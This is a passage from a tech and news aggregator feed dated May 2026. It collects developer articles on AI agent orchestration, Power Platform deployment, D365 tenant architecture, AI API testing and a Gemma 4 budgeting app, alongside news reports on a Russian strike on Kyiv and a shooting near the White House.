The model powering all of it is **Gemini 3.5 Flash**, which Google claims outperforms [Gemini 3.1 Pro](https://deepmind.google/models/gemini/pro/) on [coding benchmarks](https://livebench.ai/#/?highunseenbias=true) while running four times faster than competing frontier models.

One detail that deserves its own headline: [Gemini 3.5 Flash](https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-5/) was co-developed *using* Antigravity. Google ran the experiment on itself — and the fact that they're willing to say that publicly matters.

On stage, Director of Software Engineering [Varun Mohan](https://www.youtube.com/watch?v=T_fnhr5lVBw) used Antigravity 2.0's parallel agents to build a working operating system core from scratch — then ran a live Doom clone on top of it — **for under $1,000** in compute costs. That [demo ](https://www.youtube.com/watch?v=T_fnhr5lVBw) made headlines. The architecture behind it is more important than the demo itself.

⚠️ Gemini CLI users: Sunset date is June 18, 2026, 28 days from announcement. Migration is not optional.

## 2️⃣ Why Everyone Is Focusing on the Wrong Thing

Most coverage of Antigravity 2.0 landed on benchmarks, speed comparisons, and the OS-building demo. All accurate. None of it is the real story.

The first generation of AI coding tools followed a familiar pattern:

```
Developer writes code → AI suggests → Developer accepts/rejects → Repeat
```

The developer remained the primary *producer*. AI acted as an accelerator on a process that was fundamentally unchanged.

Antigravity 2.0 introduces a structurally different loop:

```
Developer defines goal + constraints
        ↓
Agent spawns specialized subagents
        ↓
Parallel execution across tasks
        ↓
Developer evaluates outputs
        ↓
Developer refines direction
```

Notice what changed.

The developer is no longer spending primary effort on producing implementation details. The developer spends primary effort on **defining objectives, setting constraints, and evaluating outcomes**.

The center of gravity moves from *writing* toward *orchestrating*.

That shift deserves far more attention than any benchmark chart.

## 3️⃣ The Developer-to-Director Shift

The phrase that kept coming to mind while studying Antigravity 2.0:

**The developer becomes the director.**

Directors don't personally operate every camera. They coordinate specialists toward a coherent outcome — defining the vision, allocating responsibilities, evaluating what's working, redirecting what isn't.

Software development with parallel agents increasingly looks the same.

Imagine a feature request:

"Add async payment processing with distributed tracing, rate limiting, and integration tests."

**Traditionally:** design architecture → write implementation → write tests → instrument observability → perform code review. Sequential. All on you.

**With Antigravity 2.0:**

``` js
// Conceptual Antigravity SDK orchestration
import { AgentOrchestrator } from '@google/antigravity-sdk';

const orchestrator = new AgentOrchestrator({
  model: 'gemini-3.5-flash',
  parallelAgents: 4,
  sandboxed: true, // agents run in isolated Linux environments
});

const result = await orchestrator.run({
  intent: "Add async payment processing with OpenTelemetry tracing and 90%+ test coverage",
  context: {
    codebase: './src/payments',
    constraints: ['no breaking API changes', 'preserve existing error codes']
  },
  subagents: [
    { role: 'refactor',      focus: 'async patterns'         },
    { role: 'observability', focus: 'tracing instrumentation' },
    { role: 'testing',       focus: 'integration test suite'  },
    { role: 'review',        focus: 'cross-agent consistency' }
  ]
});
```

The four specialized agents execute in parallel. The `review` subagent checks consistency *across* the other agents' outputs, a meta-layer of quality control that single-agent systems structurally cannot provide.

## 4️⃣ What Makes Antigravity 2.0 Different?

Several design decisions stand out as genuinely distinctive rather than marketing language.

### One Harness Across All Surfaces

The [desktop app](https://antigravity.google/product/antigravity-2), [CLI](https://antigravity.google/product/antigravity-cli), [SDK](https://antigravity.google/product/antigravity-sdk), and [API](https://blog.google/innovation-and-ai/technology/developers-tools/managed-agents-gemini-api/) all share a common orchestration foundation. Developers aren't learning five separate systems. They're learning one mental model expressed through different interfaces. That consistency eliminates a painful class of bugs: the "works in the GUI but fails in the CLI" failure mode that plagues tools with inconsistent backends.

### Co-Optimized Model and Harness

Google spent the months between [v1 and v2](https://dev.to/gde/google-antigravity-10-to-20ide-quick-migration-guide-35p5) co-optimizing three layers simultaneously: the product, the agent harness, and the Gemini training stack. The model is trained *against* the harness it runs inside. That feedback loop is a structural advantage that competitors using third-party models cannot easily replicate — and it's why Google's claim that Gemini 3.5 Flash was built *with* Antigravity matters beyond the anecdote.

### JSON Hooks for Extensibility

A new hooks system lets you intercept and control agent behavior at execution time without modifying the agent itself:

```
{
  "hooks": {
    "pre_execution": {
      "type": "approval_gate",
      "condition": "file_changes > 50",
      "action": "require_human_approval"
    },
    "post_execution": {
      "type": "audit_log",
      "destination": "compliance_db",
      "fields": ["agent_id", "files_modified", "timestamp", "cost_tokens"]
    }
  }
}
```

This is what enables compliance checkpoints, custom logging, and approval gates — the features that make enterprise adoption feasible rather than aspirational.

### Project Scope Replaces Workspace Scope

Previously, agent conversations were scoped to a single repository. Now they're scoped to a "project" spanning multiple folders, each with independent permission settings. This unlocks genuine cross-repo tasks — refactoring a shared library and its consumers simultaneously — while preserving fine-grained access control.

### Honest Admission on Browser Capability

The [`/browser`](https://antigravity.google/docs/getting-started) command is an explicit opt-in, not a default. The team acknowledged that agents weren't reliably deciding *when* to use the browser on their own. Rather than ship a system that behaves unpredictably, they made it explicit. That kind of candor is worth noting: it signals a team that prioritizes trustworthy behavior over impressive demos.

## 5️⃣ I Tested the New Mental Model

Rather than just analyzing announcements, I wanted to stress-test the orchestration premise with a realistic scenario.

I took a moderately complex service — a document processing module handling file intake, classification, and storage — and worked through specifying it for agent execution versus writing it manually.

**What I discovered:**

**The specification problem is harder than it looks.** When writing for myself, I hold context in my head and make judgment calls mid-implementation. When specifying for agents, every constraint I didn't write down explicitly became a decision the agent made on its own. My first attempt produced a technically correct result that violated two implicit assumptions I hadn't stated: file size limits and idempotency requirements on retry. The output was plausible. It was also wrong for my specific system.

The lesson landed immediately: *the quality of your specification is now the quality of your output.*

**The /grill-me command is underrated.** This slash command makes the agent interrogate *you* with clarifying questions before writing a single line. I used it on my second attempt. It surfaced three edge cases I hadn't considered. The resulting output required almost no revision. I'd argue this command is more valuable than any benchmark number.

**Parallel agents excel at tasks that suffer from context switching.** Simultaneous agents handling refactoring, test generation, and documentation — without each one's context polluting the others — produced noticeably cleaner, more coherent outputs than sequential single-agent approaches.

**What failed:** The review agent caught internal inconsistencies but couldn't catch domain-level errors. It didn't know that "retry on failure" carried specific compliance implications in my context. The agent produces plausible code. Whether it's *correct* code for your specific system remains your responsibility.

That gap — between *plausible* and *correct* — is where the real risk lives, and it won't appear in any benchmark.

## 6️⃣ Why Orchestration Matters More Than Velocity

For years, software engineering rewarded implementation speed above most other metrics. Orchestration doesn't make velocity irrelevant — but it introduces a different set of skills that are now becoming primary dif

---
## Environment variables vs connection references in Power Platform

> Published: 2026-05-24 06:06:24+00:00
> Source: https://dev.to/sapotacorp/environment-variables-vs-connection-references-in-power-platform-1ale
> wpnews: https://wpnews.pro/news/environment-variables-vs-connection-references-in-power-platform

Environment variables and connection references in Power Platform both enable managed solutions to be imported across Dev, Test, UAT, and Prod environments without developer edits, but they serve distinct purposes: connection references point to authenticated connections (representing "who" the flow connects as), while environment variables store typed values like URLs or secrets (representing "what" the flow connects to). During import, connection references arrive empty and must be manually bound to existing connections in the target environment, whereas environment variables are populated from deployment-settings.json files. Misunderstanding this split can cause flows to either fail on import or run successfully against the wrong target system.

Both environment variables and connection references exist for the same reason: a managed solution should import into Dev, Test, UAT and Prod without the developer editing anything between stages. They achieve that goal in different ways, and teams who conflate them end up with flows that either fail on import or run successfully against the wrong target system.
Here is the split we enforce, and the deployment-settings pattern that ties it together.
Connection references are pointers to actual authenticated connections. A connection is the object that holds "here is my SharePoint authentication" or "here is my credential to Acme's REST API." A connection reference is a named slot that a flow uses instead of a direct connection.
When a managed solution imports into a new environment, connection references come in empty. They have to be bound to connections that exist in the target environment. First import pauses for the admin to create those connections; subsequent imports reuse them.
Environment variables are typed values (strings, numbers, JSON, booleans, secrets referenced from Azure Key Vault) that solution-aware code reads at runtime. A flow calls `environmentVariables('acme_AcmeApiBaseUrl')` and uses the returned value in an HTTP action.
The distinction: a connection reference represents who the flow connects as. An environment variable represents what the flow connects to.
Connection reference for:
Environment variable for:
The smell test: does the flow authenticate with this thing? Connection reference. Is it a value the flow uses? Environment variable.
When the pipeline imports a managed solution, the target environment needs values for every env variable and bindings for every connection reference. Both come from deployment-settings.json committed to the repo, one per target.
The pipeline step per target:
Secrets live in Key Vault, referenced by Key Vault URI from a secret-type env variable. Nothing sensitive lands in git.
Definitions live inside the solution at Other/EnvironmentVariables.xml. The deployment-settings file references them by SchemaName. If the casing differs, you get either:
The second is the dangerous one. A flow that hits null for an API base URL will typically construct a malformed URL and fail at the HTTP call, with an error message that points at the HTTP action rather than the missing variable.
We now generate the deployment-settings skeleton from the solution XML instead of hand-writing it:
The team fills in the Values, never the SchemaNames. One class of typo gone.
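The casing problem described above can be caught before import with a small check. The following is a minimal sketch, not the authors' tooling: it assumes the deployment-settings file has a top-level `EnvironmentVariables` list whose entries carry `SchemaName` and `Value` keys, and that the names defined in the solution have already been extracted by an earlier step. The function name `check_schema_names` and the variable `acme_TimeoutSeconds` are hypothetical.

```python
def check_schema_names(defined_names, settings):
    """Compare SchemaNames in a deployment-settings document against the
    names defined in the solution, using exact (case-sensitive) matching."""
    defined = set(defined_names)
    # Lower-cased lookup lets us tell "wrong casing" apart from "unknown name".
    by_lower = {name.lower(): name for name in defined}
    problems = []
    seen = set()
    for entry in settings.get("EnvironmentVariables", []):  # assumed file layout
        name = entry.get("SchemaName", "")
        if name in defined:
            seen.add(name)
        elif name.lower() in by_lower:
            expected = by_lower[name.lower()]
            problems.append(f"casing mismatch: '{name}' should be '{expected}'")
            seen.add(expected)
        else:
            problems.append(f"unknown variable: '{name}'")
    # Anything defined in the solution but absent from the file has no value.
    for name in sorted(defined - seen):
        problems.append(f"missing value for: '{name}'")
    return problems


defined = ["acme_AcmeApiBaseUrl", "acme_TimeoutSeconds"]  # hypothetical names
settings = {
    "EnvironmentVariables": [
        {"SchemaName": "acme_acmeapibaseurl", "Value": "https://api.example.test"}
    ]
}
problems = check_schema_names(defined, settings)
```

Running a check like this as a pipeline step would fail the build on a typo instead of letting a flow read a null value at runtime.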
First import into a new environment leaves connection references empty. The solution import succeeds but the flows cannot run - they have no connection to authenticate through.
Two ways to handle this:
Path 2 requires one-time manual work per connection per environment, then every future deploy is hands-off. Path 1 is fine for low-frequency deploys but burns human time on every release.
When a client takes over admin of an environment we built, they get:
The clearer the split is in our heads, the cleaner the handoff is for theirs.

---
## Multi-BU D365 environment: single tenant, multiple LEs

> Published: 2026-05-24 06:06:03+00:00
> Source: https://dev.to/sapotacorp/multi-bu-d365-environment-single-tenant-multiple-les-29f
> wpnews: https://wpnews.pro/news/multi-bu-d365-environment-single-tenant-multiple-les

The article outlines three architecture patterns for multinational corporations implementing D365 Finance & Operations across multiple business units (BUs). It argues that the only scalable pattern is a single tenant with multiple legal entities (LEs), where BU isolation is achieved through organization hierarchies and security roles rather than separate environments. The two failing patterns—a single unified legal entity and separate tenants per BU—are rejected for causing either immediate operational conflicts or long-term administrative and integration overhead.

Multinational corporations implementing D365 Finance & Operations across business units often underestimate how much the environment strategy decision will shape the next decade of their ERP life. Each business unit operating in a different industry brings its own processes, regulatory compliance, and data sensitivities. Picking the wrong structure at the start is expensive to reverse.
Three patterns surface in architecture workshops. Each has advocates; only one scales.
### The two corner cases that fail
Single instance with one unified legal entity for all business units. Appealing for simplicity: one configuration, one security model, one master data set. Breaks immediately when BUs have different:
- Fiscal calendars (calendar year vs fiscal year)
- Chart of accounts detail (manufacturing vs services have fundamentally different GL structures)
- Statutory reporting obligations (healthcare vs retail have distinct regulatory packages)
- Intercompany boundaries (unified LE can't intercompany with itself)
The appeal wears off in the first cross-industry consolidation discussion.
Separate tenant per business unit. Isolates BUs completely. Produces predictable problems:
- Cross-BU consolidated reporting becomes an Azure Synapse project
- Every tenant has its own license, its own upgrade schedule, its own admin overhead
- M&A that reorganizes BUs requires tenant migrations
- Economies of scale in shared configuration disappear
Teams propose this pattern when they're nervous about sharing environments. Usually the fear is solvable with security boundaries inside a shared tenant.
Custom integration layer merging outputs from separate D365 environments. Builds a new system to fix a problem the platform already addresses. Permanent ongoing cost; introduces a new source of truth; slows every new BU onboarding.
### The pattern that scales
Single tenant, multiple legal entities, with business unit isolation via organization hierarchies and security roles.
The architecture:
- One D365 tenant hosting production + non-production environments
- One legal entity per BU (or one per BU-and-country if BUs operate in multiple countries)
- Country localization packages applied per LE as needed
- Organization hierarchies - Corporate → BU → Operating Unit → Department - supporting both financial reporting cuts and security boundaries
- Security roles scoped to BU via the organization hierarchy - a BU's users see only their BU's data despite sharing the tenant
- Shared master data where BUs share vendors or customers, via global address book; BU-exclusive master data configured per-LE
- Customizations in layered models - a Core model for shared logic, BU-specific models for industry variations, deployed together
The result: BUs operate with the independence they need, while corporate gets the consolidation, shared admin, and platform economics.
### Organization hierarchy design
The hierarchy is how the tenant supports both financial and operational cuts:
- Financial reporting hierarchy: LE ↔ BU ↔ Division ↔ Corporate. Rolls trial balances up for consolidation.
- Operational hierarchy: LE ↔ BU ↔ Department ↔ Team. Drives security and workflow routing.
- Legal hierarchy: LE ↔ Parent LE ↔ Ultimate parent. For statutory ownership disclosures.
Multiple hierarchies coexist. Each serves a specific purpose. Conflating them into one is a common design error.
### Security model with BU isolation
Security inside a shared tenant keeps BU data separate via:
- Legal entity scope on roles - a BU's accountants see only their LEs
- XDS (Extensible Data Security) policies - row-level filtering beyond LE (e.g., department scope within an LE)
- Organization hierarchy context in XDS - policies reference the user's BU via hierarchy
- Centralized roles for corporate functions - corporate finance, corporate audit, IT admin roles span all LEs with approval
This is more work than "just use separate tenants" but gives the single-tenant economics without compromising data boundaries.
### Customization layering per BU
F&O's extension model supports layered customizations. The pattern:
- Foundation model - corporate-standard extensions that all BUs inherit (localization-specific tax extensions, centralized approval frameworks)
- Industry models - shared extensions per industry for BUs in that vertical (manufacturing extensions, retail extensions)
- BU-specific models - extensions unique to a single BU's needs
Each model is version-controlled separately and deployed as part of a dependency chain. A BU's customizations reach that BU without polluting the others.
### ALM across BUs
With the multi-BU tenant, ALM has to support:
- Shared build pipeline for foundation and industry models
- Per-BU pipelines for BU-specific models
- Environment strategy - dev per BU for BU-specific work, shared sandboxes for integration testing, shared UAT for coordinated testing, production shared by all BUs
The build coordination is the new complexity. Usually addressed by a center-of-excellence team that owns foundation + industry models and coordinates release trains with BU teams.
### When separate tenants is right
There are rare cases where separate tenants genuinely fit:
- Regulatory isolation required by law (certain defense or pharma scenarios)
- Data residency conflicts that can't be resolved within one tenant's regional deployment
- M&A scenarios where the acquired unit will eventually spin out
- Extreme size difference where the BU's scale warrants its own admin team
Each of these is rare. The default for multi-BU multinationals is single tenant, multi-LE.
### What ships with the pattern
A working multi-BU D365 tenant has:
- Per-BU legal entities with appropriate localization
- Organization hierarchies for financial and operational cuts
- Security roles scoped to BU via hierarchy and XDS
- Shared master data framework with BU-specific release patterns
- Layered customization models (foundation, industry, BU)
- CoE governance for shared configuration
- ALM pipelines supporting the model layering
The pattern is boring because it's well-trodden. That's the point. Novel environment strategies are where multi-year regret accumulates.

---
## At least one killed after massive Russian drone and missile attack on Kyiv

> Published: 2026-05-24 06:04:23+00:00
> Source: http://www.euronews.com/my-europe/2026/05/24/at-least-one-killed-after-massive-russian-drone-and-missile-attack-on-kyiv
> wpnews: https://wpnews.pro/news/at-least-one-killed-after-massive-russian-drone-and-missile-attack-on-kyiv

A massive Russian drone and missile attack on Kyiv early Sunday killed at least one person and injured over 20, damaging residential buildings, schools, and other infrastructure across nine districts. The assault followed Ukrainian President Zelenskyy's warning of intelligence indicating Russia was preparing a strike using the hypersonic Oreshnik ballistic missile, though it was unclear if that weapon was deployed. The attack continued after sunrise, with local authorities reporting ongoing strikes on the capital.

The attack came after Ukrainian President Volodymyr Zelenskyy warned of intelligence that Russia would launch a significant attack using the hypersonic Oreshnik ballistic missile. It was not immediately clear if the missile had been used in the overnight attack.
Russia launched a wave of overnight strikes on Kyiv early on Sunday, killing at least one person and leaving more than 20 injured, local authorities said.
The intense assault shook buildings across the city center, including near government offices, residential buildings and schools.
"Tonight Kyiv region is once again enduring a mass enemy attack with strike drones, cruise missiles and ballistic missiles," said Mykola Kalashnyk, the head of the regional military administration.
The attack continued after sunrise, with more missiles and drones expected to hit Kyiv. Damage was recorded across at least nine districts of the capital including residential buildings, Kyiv military administration head Tymur Tkachenko said in a Telegram post.
In the Shevchenko district, a school building was damaged by an attack while people sheltered inside, Mayor Vitalii Klitschko said. Local authorities reported supermarkets and warehouses across the city were also damaged.
The strikes came after the Ukrainian president warned of intelligence indicating Russia was "preparing a strike with the Oreshnik missile". The hypersonic multiple-warhead Oreshnik was first used on the Ukrainian city of Dnipro in November 2024. It was used a second time in January in the western Lviv region.
President Vladimir Putin said the Oreshnik, which means “hazelnut tree” in Russian, streaks at 10 times the speed of sound and is capable of destroying underground bunkers “three, four or more floors down.”
The weapon travels “like a meteorite” and is immune to any missile defence system, Putin said, adding that several such missiles, even fitted with conventional warheads, could be as devastating as a nuclear strike.
It was not immediately clear if the missile had been used in the overnight attack.
Russia had earlier also warned Ukraine would face "inevitable and severe punishment" for an alleged Ukrainian strike on a college dormitory in Russian-occupied Starobilsk in eastern Ukraine, which Moscow said killed 18 people.
Ukraine denied targeting civilians, saying it had hit a Russian Rubicon drone unit stationed in the Starobilsk area.
Moscow has launched mass barrages of missiles and drones at Ukraine almost daily since the full-scale offensive began in 2022, often hitting civilian infrastructure and causing civilian deaths.
US-led efforts to negotiate an end to more than four years of war have slowed in recent months with Washington's attention diverted towards its conflict in the Middle East.

---
## AI API Integration Testing Checklist for Multi-Model Apps

> Published: 2026-05-24 06:01:40+00:00
> Source: https://dev.to/ye_allen_/ai-api-integration-testing-checklist-for-multi-model-apps-4omo
> wpnews: https://wpnews.pro/news/ai-api-integration-testing-checklist-for-multi-model-apps

This article presents a testing checklist for applications that integrate multiple AI models (such as GPT, Claude, and Gemini) through a single OpenAI-compatible API gateway. It emphasizes verifying configuration details like base URLs, API keys, and model names before production, and recommends testing JSON response parsing, latency, retries, and fallback logic. The author also highlights the importance of logging metrics such as model name, request duration, and token usage to optimize cost and performance.

A single successful AI API request is not enough for production.
If your app uses GPT, Claude, Gemini, DeepSeek, Qwen, or other models through one OpenAI-compatible API gateway, I think the integration should be tested as a system: configuration, SDK compatibility, model names, JSON output, latency, retries, fallback, and Postman verification.
I published the full checklist here:
https://github.com/yeallen441-del/vectorengine-quickstart/blob/main/AI_API_TESTING_CHECKLIST.md
Most migration issues come from the wrong base URL, wrong API key, or unavailable model name. I test one small request with curl or Postman before touching production code.
For an OpenAI-compatible gateway, the goal is to keep the same OpenAI SDK request shape and only change the API key, base URL, and model name.
Example base URL:
https://www.vectronode.com/v1
Many production workflows need valid JSON. I test whether the response parses, whether required fields exist, and how the app handles bad output.
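The JSON check described above could look roughly like this. It is a minimal sketch using only the standard library; the function name `validate_model_json` and the field names `category` and `confidence` are hypothetical and stand in for whatever your feature actually requires.

```python
import json


def validate_model_json(raw_text, required_fields):
    """Return (data, errors). data is None when the text is not a JSON object."""
    try:
        data = json.loads(raw_text)
    except json.JSONDecodeError as exc:
        # Models sometimes wrap JSON in prose or code fences; treat that as a failure.
        return None, [f"invalid JSON: {exc.msg}"]
    if not isinstance(data, dict):
        return None, ["top-level value is not a JSON object"]
    missing = [field for field in required_fields if field not in data]
    return data, [f"missing field: {field}" for field in missing]


good, good_errors = validate_model_json(
    '{"category": "billing", "confidence": 0.9}', ["category", "confidence"]
)
partial, partial_errors = validate_model_json(
    '{"category": "billing"}', ["category", "confidence"]
)
bad, bad_errors = validate_model_json("Sure! Here is the JSON you asked for.", ["category"])
```

Returning the error list instead of raising keeps the decision about retrying, falling back, or surfacing the failure in the calling code.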
A useful integration log should include model name, feature name, request duration, retry count, token usage, and error status.
These fields make it easier to decide when to use a premium model and when to route to a lower-cost fallback.
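One way to capture those log fields is a thin wrapper around each request. This is a sketch under stated assumptions: `send` is a hypothetical callable that performs the request and returns a dict with an OpenAI-style `usage` entry, and `CallLog` and `call_with_logging` are illustrative names, not part of any SDK.

```python
import time
from dataclasses import dataclass
from typing import Optional


@dataclass
class CallLog:
    model: str
    feature: str
    duration_ms: float
    retry_count: int
    prompt_tokens: int
    completion_tokens: int
    error_status: Optional[str] = None


def call_with_logging(model, feature, send, max_retries=2):
    """Run send() with retries and return (result, CallLog)."""
    start = time.perf_counter()
    retries = 0
    result, error = None, None
    while True:
        try:
            result = send()
            error = None
            break
        except Exception as exc:  # a real client would catch narrower error types
            error = type(exc).__name__
            if retries >= max_retries:
                break
            retries += 1
    usage = (result or {}).get("usage", {})
    log = CallLog(
        model=model,
        feature=feature,
        duration_ms=(time.perf_counter() - start) * 1000,
        retry_count=retries,
        prompt_tokens=usage.get("prompt_tokens", 0),
        completion_tokens=usage.get("completion_tokens", 0),
        error_status=error,
    )
    return result, log
```

The measured duration covers all attempts, so a request that succeeded only after retries shows up as slow rather than looking like a fast single call.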
VectorNode AI is the OpenAI-compatible API gateway I am building around this workflow:

---
## Communication and synchronization between distributed processes

> Published: 2026-05-24 05:47:35+00:00
> Source: https://dev.to/evelyn_samanthaperezriv/comunicacion-y-sincronizacion-entre-procesos-distribuidos-4ecc
> wpnews: https://wpnews.pro/news/comunicacion-y-sincronizacion-entre-procesos-distribuidos

The article explains that communication and synchronization between distributed processes are crucial for systems where processes run on different networked computers, relying on message exchange via protocols like TCP/IP, HTTP, and RPC. It highlights the importance of synchronization techniques such as semaphores and consensus algorithms to prevent errors and data inconsistencies, while also addressing challenges like network latency and concurrency. The topic is highly relevant to modern applications, including cloud computing, online gaming, and IoT.

Communication and synchronization between distributed processes is one of the most complex and important aspects of distributed systems. Because processes run on different computers or nodes connected by a network, mechanisms are needed to exchange information efficiently and to coordinate the system's tasks correctly.
Distributed communication is based mainly on sending and receiving messages. Unlike centralized systems, where processes can share memory directly, in a distributed system information must travel across the network using communication protocols. These protocols define the rules for transmitting data, ensuring that it arrives correctly, and keeping nodes synchronized.
Among the most important protocols are TCP/IP, HTTP, and RPC. TCP/IP is the foundation of communication on the internet and allows data to be transmitted reliably between devices. HTTP is widely used for web applications and online services, while RPC allows procedures to be executed on remote computers as if they were local functions.
Synchronization is equally important, since multiple processes may try to access the same resource at the same time. Without adequate mechanisms, errors, inconsistencies, or loss of information could occur. To avoid these problems, techniques such as semaphores, mutual exclusion, logical clocks, and consensus algorithms are used.
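Of the techniques listed, logical clocks are the easiest to show in a few lines. The following is a minimal sketch of a Lamport-style logical clock, with the two nodes simulated inside one process. The class and method names are illustrative, and no real network is involved.

```python
class LamportClock:
    """Logical clock: orders events without relying on synchronized wall clocks."""

    def __init__(self) -> None:
        self.time = 0

    def local_event(self) -> int:
        # Every local event advances the counter by one.
        self.time += 1
        return self.time

    def send(self) -> int:
        # Sending is itself an event; the returned timestamp travels with the message.
        return self.local_event()

    def receive(self, message_time: int) -> int:
        # Jump past both our own history and the sender's timestamp.
        self.time = max(self.time, message_time) + 1
        return self.time


node_a, node_b = LamportClock(), LamportClock()
node_a.local_event()           # node_a.time is now 1
stamp = node_a.send()          # node_a.time is now 2, and 2 is sent with the message
node_b.receive(stamp)          # node_b.time becomes max(0, 2) + 1 = 3
```

The receive rule guarantees that a message is always timestamped later at the receiver than at the sender, which is the ordering property the technique exists to provide.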
One of the main challenges in distributed systems is network latency. Because nodes may be in different geographic locations, the time needed to send and receive information can vary considerably. This affects overall system performance and can cause delays in real-time applications.
Another significant problem is concurrency. In modern applications, thousands of users may interact with the system simultaneously. Distributed processes must coordinate to ensure that operations execute correctly without conflicts. For example, in a banking system, two users must not be able to modify the balance of an account at the same time in a way that leaves it incorrect.
Synchronization is also related to data consistency. In distributed systems it is difficult to guarantee that all nodes hold exactly the same information at all times. For this reason, there are different consistency models that balance performance and accuracy according to the needs of each application.
Today this topic is highly relevant in areas such as online video games, cloud computing, social networks, distributed artificial intelligence, and the Internet of Things. Many modern applications depend on efficient communication among multiple devices and servers to work correctly.
As a contribution to web-based research, one can analyze modern communication protocols, synchronization algorithms, methods for reducing latency, and technologies used in large-scale distributed systems. It is also possible to investigate how distributed communication influences performance and user experience in current applications.

---
## I let Gemma 4 analyze my credit card statements so I wouldn't have to

> Published: 2026-05-24 05:44:43+00:00
> Source: https://dev.to/simonwu/i-let-gemma-4-analyze-my-credit-card-statements-so-i-wouldnt-have-to-4498
> wpnews: https://wpnews.pro/news/i-let-gemma-4-analyze-my-credit-card-statements-so-i-wouldn-t-have-to

The article describes Swipey, a local-first, privacy-focused web app that uses Google's Gemma 4 AI model to analyze credit card spending across multiple banks. By uploading CSV transaction files from Chase or Capital One, the app generates monthly digests with spending spotlights, patterns, suggestions, and editable transaction groupings. The author notes that Gemma 4 served as a capable open-source replacement for Claude in this workflow, successfully categorizing transactions and surfacing spending insights.

This is a submission for the Gemma 4 Challenge: Build with Gemma 4
Swipey is a local-first, privacy-focused web app for people juggling multiple credit cards across multiple banks. Drag in a CSV of transactions from Chase or Capital One, pick a month, and Gemma 4 produces a digest of that month's spending: a spotlight, a few patterns, and a few suggestions. It also proposes "groups" that bundle similar transactions and sum the spend, which you can edit inline.
The problem: I have four credit cards. I enjoy collecting credit card reward points (anyone else?!) to help subsidize travel costs [1]. This usually means chasing different category bonuses on each (one for dining, another for travel, a third for everything else). Past two or three cards, no single bank app shows you the whole picture, and the interesting questions ("what was my biggest category this month?", "how does this compare to last month?") get hard to answer.
The first version shipped transaction-level data to Claude every month. Swipey on Gemma 4 keeps the same workflow but runs inference on Cloudflare Workers AI.
Note: Transaction data was mocked for demo purposes
Monthly insights digest (spotlight, patterns, suggestions)
Transaction grouping that bundles similar merchants/themes and sums their spend
A local-first, privacy-focused way to manage credit card spend across multiple banks, built with Next.js and PostgreSQL.
Supports Chase and Capital One CSV exports.
⚠️ Work in progress, local use only. This project is intended to run on your own machine against a local database. API routes have no authentication. If hosted, anyone who can reach the server can read or modify your transactions. The Docker Compose setup ships with default dev credentials that are not safe for any deployed environment. Don't expose this to the public internet as-is.
Model: `@cf/google/gemma-4-26b-a4b-it` (the 26B MoE variant) on Cloudflare Workers AI. This is the only Gemma 4 variant Cloudflare hosts as of May 2026, but here's how I would have picked between variants:
One caveat during the migration: Gemma 4 needed a stricter setup than Claude to emit my parser's format reliably. The fix was a system prompt insisting on the exact format, plus wrapping the user prompt in XML with an `<output>` block showing the shape to mirror. Since migration, every run has parsed cleanly.
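A prompt built along those lines might look like the sketch below. This is an illustration only, not Swipey's actual prompt: apart from `<output>`, which the post mentions, the tag names, the wording of the system prompt, and the function name `build_messages` are all assumptions.

```python
def build_messages(transactions_csv: str, output_example: str):
    """Build a chat message list that pins the model to a fixed output shape."""
    system = (
        "Respond using exactly the format shown inside <output>. "
        "Do not add commentary before or after it."
    )
    # The <request> and <transactions> tags are hypothetical; only <output>
    # comes from the description above.
    user = (
        "<request>\n"
        f"<transactions>\n{transactions_csv}\n</transactions>\n"
        f"<output>\n{output_example}\n</output>\n"
        "</request>"
    )
    return [
        {"role": "system", "content": system},
        {"role": "user", "content": user},
    ]


messages = build_messages(
    "date,merchant,amount\n2026-05-01,Cafe,4.50",
    "SPOTLIGHT: ...\nPATTERNS: ...\nSUGGESTIONS: ...",
)
```

Showing the expected shape inside the user turn, rather than only describing it in the system prompt, gives the model a concrete template to mirror.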
What stood out most is how capable open-source models like Gemma 4 have become at the kind of work Swipey leans on: categorizing/grouping transactions, summarizing a month of spend, and surfacing patterns. For this use case, Gemma 4 was a quality drop-in replacement for Claude. As these open-source models keep improving, I expect that gap to keep narrowing.
Swipey has already surfaced spending habits I hadn't even thought to track. It's an incredibly exciting time to see how AI-powered features can augment existing workflows and surface insights I would have otherwise missed.
Now if you'll excuse me, Gemma 4 has some thoughts about my dining out habits that I have to reflect on. Cya!
[1] Careful. This only works if the balance is paid off in full each month. Otherwise the interest eats the perks many times over. The rewards stack up to something real if done responsibly.

---
## Gunman killed after shootout with Secret Service near White House, Trump says

> Published: 2026-05-24 05:44:34+00:00
> Source: http://www.euronews.com/2026/05/24/gunman-killed-after-shootout-with-secret-service-near-white-house-trump-says
> wpnews: https://wpnews.pro/news/gunman-killed-after-shootout-with-secret-service-near-white-house-trump-says

A gunman was killed after exchanging gunfire with Secret Service agents near the White House on Saturday evening, with President Donald Trump inside the building but unharmed. One bystander was also struck by gunfire during the incident, while no officers were injured. Trump later stated that the shooter had a "violent history and possible obsession" with the White House.

Trump said the shooter had a "violent history and possible obsession" with the White House.
A gunman was killed following a shootout with Secret Service agents close to the White House on Saturday, US President Donald Trump and law enforcement officials said.
The individual pulled out a gun and began firing just after 6 pm on Saturday in the area of 17th Street and Pennsylvania Avenue, Anthony Guglielmi, the US Secret Service's chief of communications, said in a statement.
Trump was in the White House at the time, but he was not impacted by the incident, per Guglielmi.
"Secret Service Police returned fire striking the suspect who was transported to an area hospital where he was pronounced deceased," the statement reads. "During the shooting one bystander was also struck by gunfire."
No officers were reported to have been injured.
In a post on Truth Social, Trump said the shooter had a "violent history and possible obsession" with the White House and thanked authorities for their "swift and professional action".
It "goes to show how important it is, for all future Presidents, to get, what will be, the most safe and secure space of its kind ever built in Washington, D.C.," Trump added.
Trump has been the target of a number of suspected assassination attempts in the last two years.
In April, a man was charged with one count of attempt to assassinate the US president after authorities say he stormed the White House correspondents’ dinner armed with guns and knives.

---
## Faithfulness gate: the agent layer most teams skip

> Published: 2026-05-24 05:37:27+00:00
> Source: https://dev.to/sapotacorp/faithfulness-gate-the-agent-layer-most-teams-skip-4kl1
> wpnews: https://wpnews.pro/news/faithfulness-gate-the-agent-layer-most-teams-skip

The article explains that many AI agent teams skip implementing a "faithfulness gate," which checks whether an agent's response is actually supported by the retrieved context before delivering it to the user. This oversight can lead to confident but incorrect answers, as illustrated by a B2B SaaS customer who wasted two days trying to configure SSO after an AI assistant falsely claimed their Pro plan included it. The fix involves extracting atomic claims from the response, verifying them against the retrieved context, and either retrying the search, admitting uncertainty, or escalating to a human if the response fails the check.

